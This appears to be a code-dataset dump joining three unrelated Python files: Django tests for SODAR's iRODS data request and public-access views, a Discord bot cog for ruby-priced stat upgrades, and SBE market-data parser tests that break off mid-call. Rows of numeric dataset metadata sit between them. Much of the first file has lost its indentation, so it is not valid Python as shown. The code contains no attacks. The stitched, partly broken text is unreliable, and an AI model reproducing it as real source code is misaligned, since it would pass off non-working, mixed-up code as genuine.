        obj = IrodsDataRequest.objects.first()
        self.assertEqual(self._get_create_alert_count(self.user), 1)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
        with self.login(self.user):
            self.client.post(
                reverse(
                    'samplesheets:irods_request_accept',
                    kwargs={'irodsdatarequest': obj.sodar_uuid},
                ),
                {'confirm': True},
            )
        self.assertEqual(
            IrodsDataRequest.objects.filter(status='ACTIVE').count(), 1
        )
        # One request is still active, so the create alerts remain
        self.assertEqual(self._get_create_alert_count(self.user), 1)
        self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestRejectView(TestIrodsRequestViewsBase):
"""Test IrodsRequestRejectView"""
def test_reject_request_doesnt_exist(self):
    """Test rejecting a delete request that doesn't exist (should 404)"""
    self.assertEqual(IrodsDataRequest.objects.count(), 0)
    reject_url = reverse(
        'samplesheets:irods_request_reject',
        kwargs={'irodsdatarequest': DUMMY_UUID},
    )
    with self.login(self.user_cat):
        resp = self.client.get(reject_url)
    self.assertEqual(resp.status_code, 404)
def test_reject_admin(self):
    """Test GET request for rejecting a delete request"""
    self.assertEqual(IrodsDataRequest.objects.count(), 0)
    # Create the request as contributor
    with self.login(self.user_contrib):
        self.client.post(
            reverse(
                'samplesheets:irods_request_create',
                kwargs={'project': self.project.sodar_uuid},
            ),
            self.post_data,
        )
    self.assertEqual(IrodsDataRequest.objects.count(), 1)
    obj = IrodsDataRequest.objects.first()
    # Reject as superuser (self.user, see base class setUp)
    with self.login(self.user):
        response = self.client.get(
            reverse(
                'samplesheets:irods_request_reject',
                kwargs={'irodsdatarequest': obj.sodar_uuid},
            ),
        )
        self.assertRedirects(
            response,
            reverse(
                'samplesheets:irods_requests',
                kwargs={'project': self.project.sodar_uuid},
            ),
        )
        self.assertEqual(
            list(get_messages(response.wsgi_request))[-1].message,
            'iRODS data request "{}" rejected.'.format(
                obj.get_display_name()
            ),
        )
    obj.refresh_from_db()
    self.assertEqual(obj.status, 'REJECTED')
def test_reject_owner(self):
    """Test GET request for rejecting a delete request as owner"""
    self.assertEqual(IrodsDataRequest.objects.count(), 0)
    with self.login(self.user_contrib):
        self.client.post(
            reverse(
                'samplesheets:irods_request_create',
                kwargs={'project': self.project.sodar_uuid},
            ),
            self.post_data,
        )
    self.assertEqual(IrodsDataRequest.objects.count(), 1)
    obj = IrodsDataRequest.objects.first()
    # user_cat is the project owner (see base class setUp)
    with self.login(self.user_cat):
        response = self.client.get(
            reverse(
                'samplesheets:irods_request_reject',
                kwargs={'irodsdatarequest': obj.sodar_uuid},
            ),
        )
        self.assertRedirects(
            response,
            reverse(
                'samplesheets:irods_requests',
                kwargs={'project': self.project.sodar_uuid},
            ),
        )
        self.assertEqual(
            list(get_messages(response.wsgi_request))[-1].message,
            f'iRODS data request "{obj.get_display_name()}" rejected.',
        )
    # Rejection keeps the request but flips its status
    self.assertEqual(IrodsDataRequest.objects.count(), 1)
    obj.refresh_from_db()
    self.assertEqual(obj.status, 'REJECTED')
def test_reject_delegate(self):
"""Test GET request for rejecting a delete request as delegate"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
with self.login(self.user_delegate):
response = self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'iRODS data request "{}" rejected.'.format(
obj.get_display_name()
),
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj.refresh_from_db()
self.assertEqual(obj.status, 'REJECTED')
def test_reject_contributor(self):
"""Test GET request for rejecting a delete request as contributor"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
response = self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertRedirects(response, reverse('home'))
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'User not authorized for requested action',
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
def test_reject_one_of_multiple(self):
"""Test rejecting one of multiple requests"""
path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
self.irods_session.data_objects.create(path2)
self.irods_session.data_objects.create(path2_md5)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.post_data['path'] = path2
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(
IrodsDataRequest.objects.filter(status='ACTIVE').count(), 2
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
with self.login(self.user):
self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
)
)
self.assertEqual(
IrodsDataRequest.objects.filter(status='ACTIVE').count(), 1
)
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestListView(TestIrodsRequestViewsBase):
"""Test IrodsRequestListView"""
def test_list(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 1)
self.assertEqual(response.context['object_list'][0].path, self.path)
def test_list_as_admin_by_contributor(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
with self.login(self.user_contrib):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 0)
def test_list_as_owner_by_contributor(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
with self.login(self.user):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 1)
self.assertEqual(response.context['object_list'][0].path, self.path)
def test_list_as_contributor2_by_contributor(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
with self.login(self.user_contrib2):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 0)
def test_list_empty(self):
"""Test GET request for empty list of delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 0)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestSampleDataPublicAccess(
SampleSheetIOMixin,
SampleSheetTaskflowMixin,
SampleSheetPublicAccessMixin,
TestTaskflowBase,
):
"""Tests for granting/revoking public guest access for projects"""
def setUp(self):
super().setUp()
# Get iRODS session for rods user
self.irods_backend = get_backend_api('omics_irods')
self.irods = self.irods_backend.get_session()
# Create user in iRODS
self.user_no_roles = self.make_user(PUBLIC_USER_NAME)
try:
self.irods.users.create(
user_name=PUBLIC_USER_NAME,
user_type='rodsuser',
user_zone=self.irods.zone,
)
except irods.exception.CATALOG_ALREADY_HAS_ITEM_BY_THAT_NAME:
pass # In case a previous test failed before cleanup
self.irods.users.modify(PUBLIC_USER_NAME, 'password', PUBLIC_USER_PASS)
self.user_home_path = '/{}/home/{}'.format(
settings.IRODS_ZONE, PUBLIC_USER_NAME
)
self.assertTrue(self.irods.collections.exists(self.user_home_path))
self.user_session = get_backend_api(
'omics_irods',
user_name=PUBLIC_USER_NAME,
user_pass=PUBLIC_USER_PASS,
).get_session()
# Make publicly accessible project
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
public_guest_access=True,
)
# Import investigation and create collections
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self._make_irods_colls(self.investigation)
self.project_path = self.irods_backend.get_path(self.project)
self.sample_path = self.irods_backend.get_sample_path(self.project)
# Create test file
self.file_path = self.sample_path + '/' + TEST_FILE_NAME
self.irods.data_objects.create(self.file_path)
def tearDown(self):
# self.irods.collections.remove(self.user_home_path)
self.irods.users.remove(user_name=PUBLIC_USER_NAME)
super().tearDown()
def test_public_access(self):
"""Test public access for project"""
obj = self.user_session.data_objects.get(self.file_path)
self.assertIsNotNone(obj)
# Ensure no access to project root
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.data_objects.get(self.project_path)
def test_public_access_disable(self):
"""Test public access with disabled access"""
self.set_public_access(False)
obj = self.irods.data_objects.get(self.file_path) # Test with owner
self.assertIsNotNone(obj)
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.data_objects.get(self.file_path)
def test_public_access_reenable(self):
"""Test public access with disabled and re-enabled access"""
self.set_public_access(False)
self.set_public_access(True)
obj = self.irods.data_objects.get(self.file_path) # Test with owner
self.assertIsNotNone(obj)
obj = self.user_session.data_objects.get(self.file_path)
self.assertIsNotNone(obj)
# Ensure no access to project root
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.data_objects.get(self.project_path)
def test_public_access_nested(self):
"""Test public access for nested collection"""
new_coll_path = self.sample_path + '/new_coll'
coll = self.irods.collections.create(new_coll_path) # Test with owner
self.assertIsNotNone(coll)
coll = self.user_session.collections.get(new_coll_path)
self.assertIsNotNone(coll)
def test_public_access_nested_disable(self):
"""Test public access for nested collection with disabled access"""
self.set_public_access(False)
new_coll_path = self.sample_path + '/new_coll'
coll = self.irods.collections.create(new_coll_path) # Test with owner
self.assertIsNotNone(coll)
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.collections.get(new_coll_path)
| 36.236308 | 80 | 0.578452 | 6,927 | 71,458 | 5.74982 | 0.053559 | 0.070426 | 0.046398 | 0.03515 | 0.831982 | 0.798212 | 0.773231 | 0.745261 | 0.722865 | 0.703457 | 0 | 0.005256 | 0.323743 | 71,458 | 1,971 | 81 | 36.254693 | 0.818951 | 0.079123 | 0 | 0.706941 | 0 | 0 | 0.094563 | 0.044072 | 0 | 0 | 0 | 0 | 0.149743 | 1 | 0.037918 | false | 0.002571 | 0.017352 | 0 | 0.066838 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be49b42365066f6533aa9f926c4686dfbc653409 | 12,613 | py | Python | Not used/Upgrades.py | ReritoO-dev/enchanted-public | 68b3a5e9941e7c9c7bdb7edcabbb9bac1fa82e07 | [
"MIT"
] | 5 | 2022-01-31T22:13:54.000Z | 2022-02-21T10:15:45.000Z | Not used/Upgrades.py | ReritoO-dev/enchanted-public | 68b3a5e9941e7c9c7bdb7edcabbb9bac1fa82e07 | [
"MIT"
] | null | null | null | Not used/Upgrades.py | ReritoO-dev/enchanted-public | 68b3a5e9941e7c9c7bdb7edcabbb9bac1fa82e07 | [
"MIT"
] | 5 | 2022-01-31T17:51:45.000Z | 2022-02-14T19:17:11.000Z | import asyncio
import Config
import discord
from discord.ext import commands
import Utils
class Upgrades(commands.Cog):
def __init__(self, bot):
self.bot = bot
async def restart_upgrade(self, msg, ctx, stat, account):
account = Utils.get_account(ctx.author.id)
if stat is None:
mystring = "Health: " + str(account['stats']['health']) + " | +1 for " + str(Utils.calc_health_upgrade_cost(account['stats']['health'])) + " "+Config.EMOJI['ruby']
mystring += "\nStrength: " + str(account['stats']['strength']) + " | +1 for " + str(Utils.calc_strength_upgrade_cost(account['stats']['strength'])) + " "+Config.EMOJI['ruby']
mystring += "\nDefense: " + str(account['stats']['defense']) + " | +1 for " + str(Utils.calc_defense_upgrade_cost(account['stats']['defense'])) + " "+Config.EMOJI['ruby']
mystring += "\nEndurance: " + str(account['stats']['endurance']) + " | +1 for " + str(Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])) + " "+Config.EMOJI['ruby']
embed = discord.Embed(color = Config.MAINCOLOR, title="Upgrade stats", description="You have " + str(account['rubies']) + " "+Config.EMOJI['ruby']+"\n\n" + mystring)
await msg.edit(embed=embed)
def check(reaction, user):
return user.id == ctx.author.id and reaction.message.id == msg.id and reaction.me
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=30, check=check)
await reaction.remove(user)
if str(reaction) == "🇭":
if account['rubies'] >= Utils.calc_health_upgrade_cost(account['stats']['health']):
account['rubies'] -= Utils.calc_health_upgrade_cost(account['stats']['health'])
account['stats']['health'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Health stat from `" + str(account['stats']['health'] - 1) + "` to `" + str(account['stats']['health']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇸":
if account['rubies'] >= Utils.calc_strength_upgrade_cost(account['stats']['strength']):
account['rubies'] -= Utils.calc_strength_upgrade_cost(account['stats']['strength'])
account['stats']['strength'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Strength stat from `" + str(account['stats']['strength'] - 1) + "` to `" + str(account['stats']['strength']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇩":
if account['rubies'] >= Utils.calc_defense_upgrade_cost(account['stats']['defense']):
account['rubies'] -= Utils.calc_defense_upgrade_cost(account['stats']['defense'])
account['stats']['defense'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Defense stat from `" + str(account['stats']['defense'] - 1) + "` to `" + str(account['stats']['defense']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇪":
if account['rubies'] >= Utils.calc_endurance_upgrade_cost(account['stats']['endurance']):
account['rubies'] -= Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])
account['stats']['endurance'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Endurance stat from `" + str(account['stats']['endurance'] - 1) + "` to `" + str(account['stats']['endurance']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
except asyncio.TimeoutError:
await ctx.message.delete()
await msg.delete()
@commands.command(aliases=['u'])
async def upgrade(self, ctx, stat:str=None):
msg, account = await Utils.get_account_lazy(self.bot, ctx, ctx.author.id)
if account is None:
return
if stat is None:
mystring = "Health: " + str(account['stats']['health']) + " | +1 for " + str(Utils.calc_health_upgrade_cost(account['stats']['health'])) + " "+Config.EMOJI['ruby']
mystring += "\nStrength: " + str(account['stats']['strength']) + " | +1 for " + str(Utils.calc_strength_upgrade_cost(account['stats']['strength'])) + " "+Config.EMOJI['ruby']
mystring += "\nDefense: " + str(account['stats']['defense']) + " | +1 for " + str(Utils.calc_defense_upgrade_cost(account['stats']['defense'])) + " "+Config.EMOJI['ruby']
mystring += "\nEndurance: " + str(account['stats']['endurance']) + " | +1 for " + str(Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])) + " "+Config.EMOJI['ruby']
embed = discord.Embed(color = Config.MAINCOLOR, title="Upgrade stats", description="You have " + str(account['rubies']) + " "+Config.EMOJI['ruby']+"\n\n" + mystring)
if msg is not None:
await msg.edit(embed=embed)
else:
msg = await ctx.send(embed=embed)
await msg.add_reaction("🇭")
await msg.add_reaction("🇸")
await msg.add_reaction("🇩")
await msg.add_reaction("🇪")
def check(reaction, user):
return user.id == ctx.author.id and reaction.message.id == msg.id and reaction.me
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=30, check=check)
await reaction.remove(user)
if str(reaction) == "🇭":
if account['rubies'] >= Utils.calc_health_upgrade_cost(account['stats']['health']):
account['rubies'] -= Utils.calc_health_upgrade_cost(account['stats']['health'])
account['stats']['health'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Health stat from `" + str(account['stats']['health'] - 1) + "` to `" + str(account['stats']['health']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇸":
if account['rubies'] >= Utils.calc_strength_upgrade_cost(account['stats']['strength']):
account['rubies'] -= Utils.calc_strength_upgrade_cost(account['stats']['strength'])
account['stats']['strength'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Strength stat from `" + str(account['stats']['strength'] - 1) + "` to `" + str(account['stats']['strength']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇩":
if account['rubies'] >= Utils.calc_defense_upgrade_cost(account['stats']['defense']):
account['rubies'] -= Utils.calc_defense_upgrade_cost(account['stats']['defense'])
account['stats']['defense'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Defense stat from `" + str(account['stats']['defense'] - 1) + "` to `" + str(account['stats']['defense']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇪":
if account['rubies'] >= Utils.calc_endurance_upgrade_cost(account['stats']['endurance']):
account['rubies'] -= Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])
account['stats']['endurance'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Endurance stat from `" + str(account['stats']['endurance'] - 1) + "` to `" + str(account['stats']['endurance']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
except asyncio.TimeoutError:
await ctx.message.delete()
await msg.delete()
def setup(bot):
bot.add_cog(Upgrades(bot))
| 72.074286 | 250 | 0.554666 | 1,328 | 12,613 | 5.185994 | 0.070783 | 0.111514 | 0.052272 | 0.080151 | 0.929287 | 0.922898 | 0.922898 | 0.922898 | 0.922898 | 0.922898 | 0 | 0.004882 | 0.285499 | 12,613 | 174 | 251 | 72.488506 | 0.757989 | 0 | 0 | 0.846667 | 0 | 0 | 0.162927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026667 | false | 0 | 0.033333 | 0.013333 | 0.086667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be6e05678957d17a00023b78190e7eada9076245 | 17,671 | py | Python | tests/test_sbe_parser.py | mehazardtfgm/sbedecoder | 375e2d1f9557778170bdf3c3f0c36e721f013f52 | [
"MIT"
] | null | null | null | tests/test_sbe_parser.py | mehazardtfgm/sbedecoder | 375e2d1f9557778170bdf3c3f0c36e721f013f52 | [
"MIT"
] | null | null | null | tests/test_sbe_parser.py | mehazardtfgm/sbedecoder | 375e2d1f9557778170bdf3c3f0c36e721f013f52 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import nose
from six.moves import urllib
import tempfile
import os
import binascii
from sbedecoder import SBESchema
from sbedecoder import SBEMessage
from sbedecoder import MDPMessageFactory
from sbedecoder import SBEParser
from nose.tools import assert_equals
class TestSBEParserLibrary:
SCHEMA_URL = 'ftp://ftp.cmegroup.com/SBEFix/Production/Templates/templates_FixBinary.xml'
LOCAL_TEMPLATE_FILENAME = None
@classmethod
def setup_class(cls):
TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME = tempfile.NamedTemporaryFile().name
urllib.request.urlretrieve(TestSBEParserLibrary.SCHEMA_URL, TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
@classmethod
def teardown_class(cls):
os.remove(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
def setup(self):
self.recorded_messages = []
def test_security_status_reset_statistics(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
try:
from sbedecoder.generated import __messages__ as generated_messages
schema.load(generated_messages)
except:
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('5603a9009c16d545349ad91428001e001e000100080003259845349ad914455300000000000000000000ffffff7fed4380150004')
offset = 12
for message in parser.parse(msg_buffer, offset):
self.recorded_messages.append(message)
# Validate that we parsed a security status message
assert_equals(1, len(self.recorded_messages))
recorded_message = self.recorded_messages[0]
assert_equals(30, recorded_message.template_id.value)
assert_equals('SecurityStatus', recorded_message.name)
assert_equals(17389, recorded_message.trade_date.value)
assert_equals(1502401500001346819, recorded_message.transact_time.value)
assert_equals('Reset Statistics', recorded_message.security_trading_event.value)
assert_equals('ResetStatistics', recorded_message.security_trading_event.enumerant)
assert_equals('Pre Open', recorded_message.security_trading_status.value)
assert_equals('PreOpen', recorded_message.security_trading_status.enumerant)
assert_equals('ES', recorded_message.security_group.value)
assert_equals('', recorded_message.asset.value)
assert_equals('Group Schedule', recorded_message.halt_reason.value)
assert_equals('GroupSchedule', recorded_message.halt_reason.enumerant)
assert_equals(None, recorded_message.security_id.value)
def test_security_status(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('1409a900bbe7b5d5fe9ad91428001e001e000100080019989cd5fe9ad914455300000000000000000000ffffff7fed4380150001')
offset = 12
for message in parser.parse(msg_buffer, offset):
self.recorded_messages.append(message)
# Validate that we parsed a security status message
assert_equals(1, len(self.recorded_messages))
recorded_message = self.recorded_messages[0]
assert_equals(30, recorded_message.template_id.value)
assert_equals('SecurityStatus', recorded_message.name)
assert_equals(17389, recorded_message.trade_date.value)
assert_equals(1502402370000951321, recorded_message.transact_time.value)
assert_equals('EndOfEvent', recorded_message.match_event_indicator.value)
assert_equals('Pre Open', recorded_message.security_trading_status.value)
assert_equals('ES', recorded_message.security_group.value)
assert_equals('', recorded_message.asset.value)
assert_equals('Group Schedule', recorded_message.halt_reason.value)
assert_equals(None, recorded_message.security_id.value)
assert_equals('No Cancel', recorded_message.security_trading_event.value)
def test_incremental_refresh_verify_groups(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex(
'c30fa90082dd3f8b069bd91478000b0020000100080095ab3d8b069bd914840000200002009bb1203602000002000000805d00003e2d140001000000010030000000000080e8ca113602000002000000805d00003f2d140001000000020130000000000018000000000000019c53980a9600000024131444010000000200000001010000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
msg_count += 1
if msg_count == 1:
assert_equals(32, message.template_id.value)
assert_equals(1502402403112954773, message.transact_time.value)
assert_equals(132, message.match_event_indicator.raw_value)
assert_equals('LastQuoteMsg, EndOfEvent', message.match_event_indicator.value)
groups = [x for x in message.groups]
assert_equals(2, len(groups))
repeating_groups = groups[0].repeating_groups # no_md_entries
n = 0
for repeating_group in repeating_groups:
if n == 0:
assert_equals(243150.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322302, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(1, repeating_group.md_price_level.value)
assert_equals(0, repeating_group.md_update_action.raw_value)
assert_equals('New', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
elif n == 1:
assert_equals(243125.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322303, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(2, repeating_group.md_price_level.value)
assert_equals(1, repeating_group.md_update_action.raw_value)
assert_equals('Change', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
n += 1
assert_equals(2, n)
repeating_groups = groups[1].repeating_groups # no_order_id_entries
n = 0
for repeating_group in repeating_groups:
if n == 0:
assert_equals(644422849436, repeating_group.order_id.value)
assert_equals(5437133604, repeating_group.md_order_priority.value)
assert_equals(2, repeating_group.md_display_qty.value)
assert_equals(1, repeating_group.reference_id.value)
assert_equals('Update', repeating_group.order_update_action.value)
assert_equals(1, repeating_group.order_update_action.raw_value)
n += 1
assert_equals(1, n)
def test_incremental_refresh_verify_group_attributes(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex(
